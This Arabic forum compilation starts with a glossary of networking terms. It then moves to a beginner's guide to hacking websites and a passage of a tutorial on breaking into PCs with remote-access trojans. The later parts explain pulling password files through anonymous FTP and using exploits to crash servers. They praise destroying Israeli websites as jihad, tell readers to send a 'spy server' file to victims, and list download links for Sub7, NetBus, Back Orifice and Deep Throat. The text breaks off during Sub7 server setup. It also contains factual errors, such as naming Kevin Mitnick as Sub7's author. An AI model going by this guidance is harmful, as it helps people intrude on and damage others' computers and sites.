- ماهو الفرق بين الهكرز و الكراكز .
س:/ ماهو الفرق بين الهاكر والكراكر؟
جـ :/
1- هو الشخص الذي يعرف عده لغات معرفه جيده بحيث يكون له القدره على كتابه برامج مفيده و مبتكره .
2- هو الشخص الذي يحاول بطرق غير شرعيه أن يدخل أو يدمر الأمن للنظام أو الشبكه .. غالبا بنيه خبيثه .. هذا الأستخدام يزعج الكثير من جماعه المبرمجين الناضجين في التعريف (1) .. و هذا الوسط فضل أطلاق كلمه كراكر(cracker) لهذه المجموعه و بعض الأحيان يطلقون عليهم (هاكر ذو القيعه السوداء black hat hacker) للتفريق عن التعريف التالي .
3- الشخص الذي يحاول أن يدخل على النظام أو الشبكه بغرض مساعده صاحب النظام بأن يحذره بأن هناك عيوب في أمن النظام و هؤلاء يطلق عليهم هالكر ذو القبعه البيضاء white hat hacker) الكثير من هؤلاء يوظفون من قبل شركات أمن الكمبيوتر على الأنترنت .. و يعملون شئ موافق للقانون تماما و الكثير منهم هاكر كما في التعريف(2) .
=====================================
وهذه مصطلحات شائعة في عالم أمن المواقع
A)
Administrator - المدير
شخص يقوم بإعداد مصادر الشبكة وتسجيل المستخدمين وأرقامهم السرية وصيانة المصادر.
Agent - عميل
في نظام (العميل/الموفر) (Client/Server) ، ذلك الجزء من النظام الذي ينفذ عملية إعداد وتبادل المعلومات نيابة عن برنامج المضيف Host أو الموفر Server.
Alert - تحذير
تقرير عن وجود خطأ بشكل صندوق تحذير أو صوت يطلقه الكمبيوتر.
ASCII - قاعدة المعايير الأمريكية لتبادل المعلومات
American Standard Code for Information Interchange معيار لتحويل الأحرف إلى أرقام وتحتوي على سبعة جزيئات بقيمة ثنائية تتراوح بين الصفر و 127.
Anonymous - مجهول
يتم استخدامه كاسم مستخدم للدخول على بعض الكمبيوترات البعيدة.
Authentication - التوثيق
تعريف هوية شخص أو الإجراءات الخاصة بذلك.
B)
Band Width - عرض النطاق
هي كمية المعلومات التي يمكنك إرسالها على خط معين في وقت محدد. عرض النطاق يقاس بعدد النبضات في الثانية Bits per Second وتكتب (bps).
BBS - لوحة إعلانات النظام
كمبيوتر مزود ببرامج معينة يوفر رسائل إلكترونية وملفات إضافة للخدمات الأخرى.
Binary - ثنائي
وسيلة عد تستخدم الرقمين 0 و 1 ، وهي الوسيلة التي يعمل بها الكمبيوتر داخلياً، وتحتوي الملفات الثنائية على ثمان جزئيات تتراوح بين صفر و 255
Browser - متصفح
برنامج يستخدم للإبحار في الشبكة العنكبوتية WWW.
C)
Client - تابع
جهاز كمبيوتر يقوم بطلب الخدمة من جهاز كمبيوتر آخر، فعندما يطلب كمبيوتر اشتراك مع موفر خدمة ISP فإنه يعتبر تابع لموفر الخدمة (Client of ISP).
Compression - ضغط
خطوات ضغط المعلومات لتخزين الملف في مساحة أصغر.
Connection - ربط
وسيلة اتصال بين جهازي كمبيوتر.
Crack - تخريب
مصطلح يطلق على برنامج يقوم بفك شفرة أحد البرامج المشتركة وجعله مجاني.
Cracker - مخرب
شخص يحاول الدخول على نظام ما دون تصريح ويسبب له أضرار.
D)
Data - بيانات
معلومات وبشكل خاص المعلومات المستخدمة بواسطة البرامج، أصغر وحدة في المعلومة يمكن للكمبيوتر فهمها هي bit.
Default - بديل افتراضي
قيمة أو فعل أو ترتيب يقوم الكمبيوتر بافتراضه في حال عدم قيام المستخدم بإعطاء تعليمات صريحة بخلاف ذلك. هذا النظام يمنع البرنامج من التعطل أو الاصطدام في حال عدم إعطاء قيمة بواسطة المستخدم.
Device - جهاز
الأجزاء التي يتركب منها الكمبيوتر Hardware مثل الشاشة والطابعة وخلافه، هذه الأجزاء يمكن أن يطلق عليها أيضاً الأجزاء الخارجية Peripheral لأنها منفصلة بصورتها المادية عن الكمبيوتر ولكنها مربوطة به.
جزء من الكمبيوتر أو قطعة من الأجهزة الخارجية التي يمكنها نقل المعلومات.
أي قطع أو معدات يمكن ربطها بالشبكة مثل الكمبيوتر والطابعة وموفر الملفات وموفر الطابعة وخلافه.
Dial-up - اتصال
استخدام التليفون أو ISDN لربط الكمبيوتر باستخدام مودم بخدمة الانترنت. وهي عكس الاتباط المستمر Permenant Connection وهذا يعني أنه كي تحصل على الخدمة فإنه عليك أن تعمل مكالمة هاتفية.
Domain - حقل
هو ذلك الجزء من الـ DNS الذي يحدد مكان شبكة كمبيوترك وموقعها في العالم.
DNS - نظام أسماء الحقول
Domain Name System هو نظام لتحديد العناوين الشبكية IP Addresses المطابقة للكمبيوترات المسماة والحقول Domains.. الـ DNS يتكون من سلسلة من المعلومات تفصل بينها نقاط... خدمة أسماء الحقول Domain Name Service هي عبارة عن برنامج يقوم بتحويل أسماء الحقول Domain Names إلى عناوين شبكية IP Addresses.
E)
Electronic Mail البريد الالكتروني
يرمز له e-mail وهو نظام يمكن بموجبه لمستخدم الكمبيوتر تبادل الرسائل مع مستخدم آخر أو مجموعة مستخدمين بواسطة شبكة اتصال، ويحتاج البريد الالكتروني إلى برنامج بريد مثل: Outlook أو Eudora ليتمكن من الارسال.
Emotion- رموز المشاعر
رموز تستخدم للتعبير عن المشاعر على الانترنت مثل « ابتسامة ، غضب »
Encryption - التشفير
هو معالجة كتلة من المعلومات بهدف منع أي شخص من قراءة تلك المعلومة باستثناء الشخص المقصود إرسالها إليه، وهناك العديد من أنواع التشفير.
F)
FAQs - الأسئلة المتكررة
Frequently Asked Questions وثيقة على الانترنت الغرض منها فحص وتدقيق المعلومات التي يحتاج إليها الكثير من الأشخاص بصفة متكررة.
Firewall - جدار نار
نظام تأمين لتقييد عملية الدخول على الكمبيوترات الموجودة على شبكة محلية LAN من أي مكان في الخارج.
Flame - التطهير
ردة فعل غاضبة لرسالة تم نشرها على Usenet أو القوائم البريدية Mailing List أو لوحات النقاش Message Boards ، التطهير يحدث لعدة أسباب مثل تعميم رسالة على الانترنت أو طرح سؤال توجد إجابته في الـ FAQs، حرب التطهير قد تحدث عندما يرد شخص تعرض للتطهير على الرسالة أو الرسائل التي وصلته.
Gateway - بوابة
مصطلح (بوابة Gateway) لم يعد يستخدم حالياً ، والبوابة هي أداة أو برنامج اتصال يقوم بتسيير المعلومات من شبكة إلى أخرى.
Gopher - خدمة جوفر
نظام طورته جامعة مينيسوتا الأمريكية بهدف تسهييل عملية استخدام الانترنت وهو يعتمد على عملية البحث من خلال القوائم لقراءة الوثائق ونقل الملفات. Gopher يمكنه الإشارة الى الملفات ومواقع Telnet ومراكز معلومات WAIS وغيرها.
H)
Hacker - متطفل
المتطفل هو الشخص الذي يشعر بالفخر لمعرفته بطرق العمل الداخلية للنظام أو الكمبيوتر أو الشبكات بحيث يسعى للدخول عليها دون تصريح.
Host - مضيف
غالباً ما يستخدم مصطلح ( مضيف Host) للكمبيوتر الذي يتيح للمستخدمين الدخول عليه.
HTTP - بروتوكول نقل النص التشعبي
HTTP هي وسيلة تجعل من الممكن التصفح عبر وثائق الشبكة العنكبوتية، المستخدم يضغط على نقاط ربط موجودة على وثيقة الشبكة العنكبوتية مما يمكنه من الذهاب إلى تلك الوثيقة حتى لو كانت موجودة على جهاز آخر.
I)
ISDN - الشبكة الرقمية للخدمات الموحدة
Intergrated Services Digital Network هي تكنولوجيا جديدة تحتوي على شبكات صوتية ورقمية في وسيلة واحدة وتعتبر خدمة اتصالات فائقة السرعة.
IP - بروتوكول الانترنت
Internet Protocol هو طبقة الشبكة الخاصة بحاشية بروتوكول TCP/IP والتي تستخدمها الأدوات على الانترنت للاتصال ببعضها. والـIP Address (عنوان بروتوكول الانترنت) هو العنوان الخاص بكل كمبيوتر متصل بشبكة ولكل عنوان الـIP طريقتين للكتابة اما رقمية (TCP/IP Address) مثل 212.26.66.3 أو حرفية (FQDN) وهي العناوين التي نكتبها عادة في المتصفحات مثل ftp.empac.co.uk والعنوان الحقيقي هو الرقمي ولكن لصعوبة حفظه فنكتب العنوان الحرفي ولكن في الشبكة داخلياً يتم ترجمة العنوان الحرفي الى العنوان الرقمي المطابق له.
ISP - مقدم خدمة الانترنت
Internet Service Provider هو الشركة التي يقوم المستخدم - عادة - بالاشتراك لديها للحصول على ربط بالانترنت، وهذه الشركة مرتبطة بالانترنت مباشرة من احدى الشركات الأعضاء في CIX.
J)
JPEG
وسيلة لضغط الصور المستخدمة في الانترنت
K)
Kilobit - كيلو بت
وحدة قياس تعادل 1024 ب, وتستخدم عادة في تحديد الطاقة الاستيعابية للذاكرة
Kilobyte - كيلو بايت
وحدة قياس تعادل 1024 بايت.
L)
Layer - طبقة
شبكات الكمبيوتر قد تنظم على شكل مجموعة أعداد أكثر أو أقل من البروتوكولات المستقلة كل منها في طبقة Layer وقد تسمى مستوى Level.
Login - تسجيل
أي أن تقوم بتسجيل اسمك كمستخدم لنظام أو شبكة فيصبح لديك اسم مستخدم Login Name.
Log off - انهاء عملية التسجيل
هو اخبار النظام بانك أنهيت عملك وستقطع الارتباط.
Lurking - التواري
يستخدم هذا المصطلح للتعبير عن شخص ليس لديه مشاركة نشطة في مجموعة الاخبار او لوحة النقاش أو قائمة البريد التي اشترك معها، ويفضل التواري للأشخاص المبتدئين الذين يريدون التأقلم في البداية مع الآخرينز
M)
Mailing List - قائمة بريد
قائمة بعناوين الكترونية لعدة أشخاص. كل شخص مشترك في هذه القائمة يرسل موضوعاً يخص اهتمامات هذه القائمة الى كمبيوتر رئيسي يقوم بتحويل هذه الرسالة الى جميع المشتركين في القائمة البريدية، هناك قوائم معدلة Moderated وتعني أن الرسالة ترسل في البداية الى صاحب هذ ه القائمة ليدقق فيها واذا تأكد من صلاحيتها يقوم بارساله للبقية وهناك قوائم غير معدلة Unmoderated وتقوم بارسال الرسالة أتوماتيكياً للمشتركين.
- ميجا بايت
وحدة قياس تعادل 1024 كيلو بايت أو 1048576 بايت.
MIME - توصيلة بريد الانترنت المتعددة الأغراض
Multipurpose Internet Mail Extension نظام لتوفير القدرة على نقل البيانات غير النصية كالصور والصوت والفاكس من خلال البريد الالكتروني.
N)
Netiquette - آداب الشبكات
الالتزام بقواعد سلوك ملائمة عند استخدام الشبكة
NETBIOS - نظام شبكة المدخلات والمخرجات الأساسي
Network Basic Input/Output System يسمح للأجهزة التي تعمل بنظام DOS من التحدث مع واستعمال خدمات الشبكة. نفس الاسم هو اسم بروتوكول شبكة محلية يستخدم بشكل واسع في منتجات ميكروسوفت.
Newsgroup - مجموعة أخبار
مجموعات الأخبار التي قد يصل عددها الى 16.000 مجموعة تكون معاً الـUsenet، وهي بمثابة الصحف التي تناقش جميع موضوعات الحياة وأي موضوع قد يخطر ببالك، ومعظم موفري الخدمة يوجد لديهم موفر مجموعات أخبار Newsgroup Server.
O)
On-Line/Off-Line - متصل/غير متصل
On-Line تعني أن الكمبيوتر متصل حالياً بالشبكة وعكسه Off-Line أي غير متصل.
PING - مجمع كتلة الانترنت
Packet InterNet Grouper برنامج يستخدم لاختبار القدرة الوصولية وذلك بارسال طلب صدى ICMP اليها وانظار الرد
PPP - بروتوكول نقطة الى نقطة
Point-to-Point Protocol إحدى وسيلتين لتبادل كتل البيانات عبر انترنت بواسطة خطوط الهاتف ( الوسيلة الأخرى هي SLIP) بروتوكول PPP يوفر وسيلة ضغط للبيانات وتصحيح الأء ولايزال تحت التطوير.
POP - بروتوكول مكتب البريد
Post Office Protocol يسمح للمستخدم بتخزين رسائله في كمبيوتر شركة توفير الخدمة كي يقوم باسترجاعها فيما بعد، وهناك ثلاث طبعات لهذا النظام POP و POP2 و POP3.
Port - ميناء (منفذ)
تحديد موقع برنامج معين على كمبيوتر مضيف على الانترنت.. قبل سنوات قليلة كان على المستخدم تحديد البورت بنفسه؛ المنفذ 23 خاص بالـTelnet والمنفذ 21 خاص بالـFTP، أما اليوم فمعظم البرامج تحدد المنفذ اتوماتيكياً.
Proxy - تفويض
طريقة يقوم بمقتضاها جهاز - موجه غالباً - بالرد على طلبات للدخول على مواقع معينة وبذلك يقوم بتنفيذ هذا الطلب بناء على الأوامر التي تلقاها وعلى التوجيه الذي صُمِمَ عليه.
Q)
Queue - صف
كتل احتياطية تنتظر المعالجة
R)
RAM - ذاكرة الدخول العشوائي
Random - Access Memory الجزء من ذاكرة الكمبيوتر الذي يقوم بتخزين المعلومات بصفة مؤقتة بينما هي تحت الاستخدام . أغلب الكمبيوترات تحتوي على 512 KB من ذاكرة الرام، هذه المعلومات اذا أغلقت الجهاز ولم تحفظها تختفي الى الأبد.
Remote - بعيد
لايمكن ربطه مباشرة باستخدام أسلاك محلية ولكنه يحتاج الى أدوات اتصال.
Router - موجه
نظام كمبيوتر يتخذ القرارات الخاصة بتحديد اتجاهات الحركة على الانترنت.
S)
SLIP - بروتوكول الانترنت ذو الخط المتسلسل
Serial Line Internet Protocol هو بروتوكول يستخدم لتشغيل بروتوكول الانترنت IP على خطوط متسلسلة Serial Lines كدوائر الهاتف. عادة عند الارتباط بموفر خدمة يستخدم اما PPP أو SLIP.
Server - خادم (موفر)
جهاز يفتح للمستخدمين لتوفير الخدمات لهم كنقل الملفات وغيرها.. الشخص الذي يدخل على الـServer يسمى Client
Shell - المحارة
برنامج يوفر للمستخدم القدرة على التفاعل مع الكمبيوتر.
SMTP - بروتوكول نقل البريد البسيط
بروتوكول يستخدم لنقل البريد الالكتروني بين الأجهزة.
Spamming - التعميم
مصطلح يطلق على عملية تعميم رسالة في مجموعات الأخبار أو البريد الالكتروني. ويقابله التطهير Flaming.
Standard - معيار (افتراضي)
مجموعة من المواصفات لتصميم البرامج يتم الاعتراف بها من قبل بائعين أو منظمة رسمية.
T)
T1
مصطلح AT&T يعبر عن وسائل النقل الرقمية Digital التي تستخدم لنقل DS-1 الاشارات الرقمية المشكلة وذلك بسرعة 1.5 MB في الثانية (سرعة خارقة) وذلك باستخدام خط مؤجر Leased Line وهناك أيضاً T3 التي تستخدم لنقل DS-3 بسرعة 44.746 MB في الثانية.
TCP - بروتوكول التحكم بالنقل
يقوم هذا البروتوكول بتمرير المعلومات الى بروتوكول الانترنت IP وهو مسئول عن التأكد من وصول الرسالة وأنها مفهومة.
Telenet - الاتصال عن بعد
Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد.
Trojan Horse - حصان طروادة
برنامج كمبيوتر يحمل داخله وسائل تسمح لمكونه الدخول الى النظام الذي زُرِعَ فيه.
URL - معين المصادر المنتظم
Uniform Resourse Locator وسيلة معيارية للإشارة للمصادر تقوم بتحديد نوع الخدمة بالاضافة الى موقع الملف أو الدليل.
Unix - نظام يونيكس
نظام تشغيل تستخدمه معظم شركات توفير الخدمة ويقوم بربط عدة أجهزة تابعة Clients به للدخول عليه.
Usenet - شبكة المستخدم
شبكة من مجموعات الأخبار تتكون من 16.000 مجموعة أخبار تهتم بجميع شؤون الحياة.
Virus - فيروس
برنامج يكرر ويضاعف نفسه عن طريق دمج نفسه بالبرامج الأخرى ويضر الكمبيوتر كثيراً.
W)
White Pages - الصفحات البيضاء
مراكز معلومات توفر خدمات ومعلومات عن أشخاص معينين.
Whois
برنامج يتيح لمستخدمه البحث في مراكز المعلومات عن أشخاص وعناوين.
WAIS
نظام يتيح لمستخدمه البحث عن موضوع معين باستخدام كلمات مفتاحية Keywords.
Winsock
نظام التقاء في ويندوز، واذا أردت الدخول على الانترنت فيجب أن يتوفر لديك ملف يدعى winsock.dll موضوع داخل النظام. المشكلة التي تتكرر كثيراً هي أنه ليس جميع البرامج تعمل مع نفس طبعة winsock تطبيق trumpet الذي يستعمله الكثيرون يستخدم لتوفير ربط SLIP بين حاسباتهموتقوم الانترنت بتوفير نسخة من winsock.
WWW - الشبكة العنكبوتية العالمية
برنامج يعمل باستخدام نقاط ربط Hybertext link كي يتمكن المستخدم من التصفح بواسطة النقر على الروابط.
Worm - دودة
برنامج يكرر نفسه ولكنه يتكاثر في الشبكة بشكل مقصود بعكس الفيروسات، دود الانترنت الذي حدث عام 1988 ربما يكون الأشهر فقد استطاع الدود أن يتكاثر في أكثر من 6000 نظام.
WYSIWYG - ماتراه هو ماتحصل عليه
What You See Is What You Get هومصطلح يطلق على بعض برامج تصميم صفحات الويب التي تتيح رؤية ماستكون الصفحة عليه من خلال البرنامج نفسه.
X)
X - Modem
بروتوكول يستخدم لنقل الملفات بين حاسبين عادة بواسطة مودم.
Y)
Yellow Pages - الصفحات الصفراء
خدمة تستخدم بواسطة اداريي UNIX بغرض ادارة مراكز المعلومات الموزعة عبر الشبكة.
Y - Modem
بروتوكول يستخدم لنقل الملفات بين حاسبين عادة بواسطة مودم.
Z)
Z - Modem
بروتوكول يستخدم لنقل الملفات بين حاسبين عادة بواسطة مودم.
Zone - نطاق
مجموعة من أدوات الشبكة Apple Talk.
Unix: نظام تشغيل عادي كالويندوز لكن التعامل معه ليس سهلاً كما في اليوندوز...
----------------------
Linux: وهذا أيضاً نظام تشغيل متطور ورائع...ويشترك مع الذي قبله في كثير من النقاط...
----------------------
IIS: من أكثر الكلمات التي تمر علينا...وهي اختصار لـ Internet Informaition Service وتعني
خدمات معلومات الانترنت وهي تأتي مع الويندوز الخاص بالسيرفرات...وسأوضح ماهو IIS بالتفصيل لاحقاً...
----------------------
APATCH: وهذه الكلمة أيضاً مشهورة بيننا...وتعريفه أنه برنامج يعمل على اجهزة سيرفرات بنظام
تشغيل اسمه Solaris...أيضاً سأوضح ماهو APATCH لاحقاً...
----------------------
Root: هذا هو أقوى مستخدم في نظامي التشغيل Unix و Linux...لا تستعجل ستعرف كل شيء...
----------------------
PHP: وهي اختصار لـ Personal Home Page tools وهي لغة برمجة تستخدم لتطوير مواقع الويب وإنشائها...
وقدأنشأها شخص يدعى راسموس ليدروف عام 1994م.
----------------------
CGI: وتعني COMMON GATEWAY INTERFACE وهي الواجهة التي تسمح بالاتصال بين جانب المستخدم عن طريق
المتصفح أو البرامج وخلافه,وجانب الويب سيرفر الذي يفهم البروتوكول (HTTP) .
----------------------
ANONYMOUS: مجهول,وهو المتحكم او المستخدم الاساسي وهو اول رتبة في تحكم بروتوكول FTP .
----------------------
Ping: من أشهر المصطلحات وهي عبارة عن حزمة بيانات ترسل لشيء ما والمطلوب هو معلومات
عن الشيء المرسل إليه...وهناك أدوات وبرامج خاصة بالـPing لكن يظل الدوس هو أشهر هذه الأدوات...
----------------------
الكاتب : زائر
مصطلحات مهمة للمبتدئين في تعلم اختراق المواقع
السلام عليكم
لقد اعددت هذا الملف لاخواني المبتدئين في تعلم طرق اختراق المواقع ، فقد
تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد لا يفهمونها ،
و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم . فالله الموفق.
=============================
تلنت (Telnet):-
و هو برنامج صغير موجود في الويندوز . و هو يعمل ككلاينت
أو وضعيته تكون دائما كزبون . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز
غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر
عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
Anonymous Mode لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى Start ==> Run ==> telnet و ستظهر شاشة التلنت.
-------------------------------------------------------------------------
برامج السكان أو Scanner:-
و هي برامج موجودة للمسح على المواقع و كشف
ثغراتهاإن وجدت ، فهي سريعة، كما أنها تملك قاعدة بيانات واسعة و كبيرة
تحتوي على الثغرات أو الاكسبلويت (Exploits) التي يتم تطبيقها على الموقع
لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة
هذه البرامج، برنامج Shadow Security Scanner و Stealth و Omran Fast
Scanner ، الخ .
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ IIS و منها برامج المسح
على ثغرات السي جي اي فقط CGI و ما الى ذلك .
------------------------------------------------------------------------
اكسبلويت (Exploits):-
هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL ، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ Buffer Over Flow Exploits .
هناك أنواع من الإكسبلويت ، فمنها ال CGI Exploits أو ال CGI Bugs و منها
ال Unicodes Exploits و منها ال ، Buffer Over Flow Exploits ، و منها
ال PHP Exploits ،و منها الDOS Exploits و التي تقوم بعملية حجب الخدمة
للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر
أي فايروول Fire Wall . و هناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c) .
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
أي الاكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
-----------------------------------------------------------------------
الجدار الناري FireWall:-
هي برامج تستعملها السيرفرات لحمايتها من الولوج
الغير شرعي لنظام ملفاتها من قبل المتطفلين . هي تمثل الحماية للسيرفر طبعا ،
و لكني أنوه بأن الفايروولات المستخدمة لحماية السيرفرات ( المواقع ) تختلف
عن تلك التي تستخدم لحماية الأجهزة .
-----------------------------------------------------------------------
Anonymouse:-
هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه .
-----------------------------------------------------------------------
Valnerableties:-
أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟ ، Valnerable أي ثغرة أو بالأصح موضع الضعف و المكان
الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة
بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
Security Focus أو بوق تراك او غيرها .
-----------------------------------------------------------------------
passwd file :
هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
-----------------------------------------------------------------------
الجذر أو الـ root :
و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
-----------------------------------------------------------------------
السيرفر Server:
هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون
المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد . - جزاكم الله خيرا أيها المجاهدون - .
------------------------------------------------------------------------
بوفر أوفر فلو ( Buffer over Flow ) :
و هي نوع من أنواع الاكسبلويتات التي
تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي
أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة
الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها
في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها .
و هي شبيهة نوعا ما بعملية حجب الخدمة - DOS - اذ أنها تقوم بعملية اوفر لود على
جزء مركز من السيرفر
طريقة اختراق الاجهزة من الصفر حتى الأحتراف
سوف ينقسم الدرس الي إحدى عشرة نقطة :-
1- مقدمة عن الهكرز.
2- أقسام هكرز الأجهزة.
3- برنامج الهكرز.
4- المنفذ (Port).
5- الأي بي (IP).
6- البرامج الاكثر أستخداما .
7- بعض برامج الهكرز وشروحاتها
8- ميكانيكية الاختراق .
9- طرق الحماية من الهاكرز معرفة اذا كان جهازك مصاب بملف تجسس أم لا
10- معرفة أذا كان جهازك قد تم أختراقه
11- عدم كشف السيرفر من الانتي فايروس
11- ملاحظات ومعلومات عامة.
12- النهاية.
والآن نبدأ الشرح
1- مقدمة عن الهكرز:-
الهكرز هم أشخاص أصلا مبرمجين محترفين طوراا قدراتهم وأصبحوا يستطيعون التسلل الي الأجهزة والمواقع وغيرهاا وأسمهم بالعربي مخترقون أو متسللون أما الانجليزي وهو الشائع الكتابة بنطقه بالعربي هو (Hackers)
##################################################
##2- أقسام الهكرز:-
الهكرز ينقسمون الي ثلاث أقسام (طبعاا هكرز الاجهزة)
أ- المبتدىء : وهو أخطر أنواع المخترقين لأنه يريد تجربة كل ما تعلمه وغالبا ما
يحب التدمير وتخريب الاجهزة
ب- الخبير: وهذا لاخوف منه لأنه يخترق الاجهزة فقط للبحث فيهاا و أخذ ما يعجبه منها
ج- المحترف: وهو يجمع الأثنين معاا فأولا يأخذ الأشياء التي يريدها من جهاز الضحية وبعدهاا يقوم بتدميره
##################################################
3- برنامج الهكرز:-
كل برنامج هكرز ينقسم الى ثلاث أقسام وهي
أ- ملف البرنامج الرئيسي وهو الذي من خلاله سوف تقوم بأختراق جهاز الضحية
ب- ملف التجسس (Server) وهو الملف الذي يقوم بأكبرجزء في الأختراق ولا أنصحك بفتحه
ج- أعدادات ملف التجسس أو ((Edit Server)) ومن خلاله تقوم بصنع ملف التجسس والذي سوف ترسله الي الضحية
##################################################
#
4- المنفذ (Port):-
وأتوقع أنه مفهوم من من نفس الكلمة فهو منفذ يصل بينك وبين الضحية عن طريقه يتم أختراق الضحية ونقل الملفات من الى أمثلة على المنافذ:-
8080
25
26
12
6588
80
وغيرها
##################################################
##
5- الأي بي (IP)
وهو أهم شيء في أختراق الاجهزة ولا يتم الأختراق ألا به وتستطيع معرفة الأي بي الخاص بك من
أ- أبدأ
ب-تشغيل
ج- أكتب الامر winipcfg
ستفتح نافذة أمام الكلمة "عنوان IP " ستجد أرقام مكتوبة مكونة من أربع أجزاء هي الأي بي الخاص بك كل جزأ يدل على شيء فالجزء الاول يدل على مكان الأقامة والجزء الثاني أو الثالث يدل على مزود خدمة الانترنت ويجب أن تكون على الانترنت حتى يظهر الاي بي الخاص بك أما أذا لم تكن على الانترنت فسوف يظهر لك أصفار.
##################################################
##
- البرامج الالكثر أستخداما:-
ينتشر في العام العربي عدة برامج هكرز ومن أكثرهاا أنتشارا السب سفن (Sub7) لسهولة أستخدامه وكثرة الميزات التي به من المرحة والمرعبة ومبرمجه هو الهكر الكبير كيفن ميتنك لكن ذالك لا يعني أنه الاقوى .
ويوجد بعض البرامج الاخرى مثل الهاك أتاك والنت بص والديب ثرو ولكن أستخدامهم قليل.
أما عن أقوى برنامج هكرز فهو الباك أوورفايس ولكن لا يستخدمه ألا الخبراء المحترفين لصعوبة أستخدامه وتعقيده ولكنه أقوى البرامج مع شهادة أكبر الهكر
##################################################
#######
7- بعض برامج الهكرز وشروحاتهاا:-
وهو أكبر جزء في الدرس و سوف أقوم بشرح السب سفن 2.2 لأنه أسهل برنامج على المبتدئين طبعاا ولكن ليس البرامج أنما أعدادات السيرفر لأنه البرنامج عربي ولا يحتاج لشرح
وصلة البرنامج http://www.s7a.netfirms.com/t3reb2.2.zip
بعض البرامج
جميع اصدارات سب سفن في هذا الموقع
http://www.sub7.net/downloads.shtml
ملف تعريب آخر اصدار الطريقة مرفقة مع الملف http://www.s7a.netfirms.com/t3reb2.2.zip
---------------------------------------
اصدارات نت بص
http://portwolf.hack3r.com/zips/netbusfirst.zip
http://portwolf.hack3r.com/zips/netbus1.2.zip
http://portwolf.hack3r.com/zips/netbus1.53.zip
http://portwolf.hack3r.com/zips/netbus1.6.zip
http://portwolf.hack3r.com/zips/netbus1.7.zip
http://portwolf.hack3r.com/zips/netbus2.0.zip
http://portwolf.hack3r.com/zips/nbpro201.zip
--------------------------------------
اصدارات الباك اورفيس
http://portwolf.hack3r.com/zips/backorifice.zip
http://portwolf.hack3r.com/zips/bo2k.zip
http://portwolf.hack3r.com/zips/boclient.zip
-------------------------------------
ديب ثروت 3
http://portwolf.hack3r.com/zips/deepthroat3.zip
------------------------------------------------
ديب ثروت
http://portwolf.hack3r.com/zips/deepthroat.zip
-------------------------------------------------
شرح أعدادات السيرفر (Edit Server)
1-بعد تحميل البرنامج وفك ضغطه سوف تجد ثلاث أجزاء البرنامج الاساسي السيرفر وإديت سيرفر كما ذكرت
2- إضغط على Edit server
3- ثم إضغط على run in normal mode
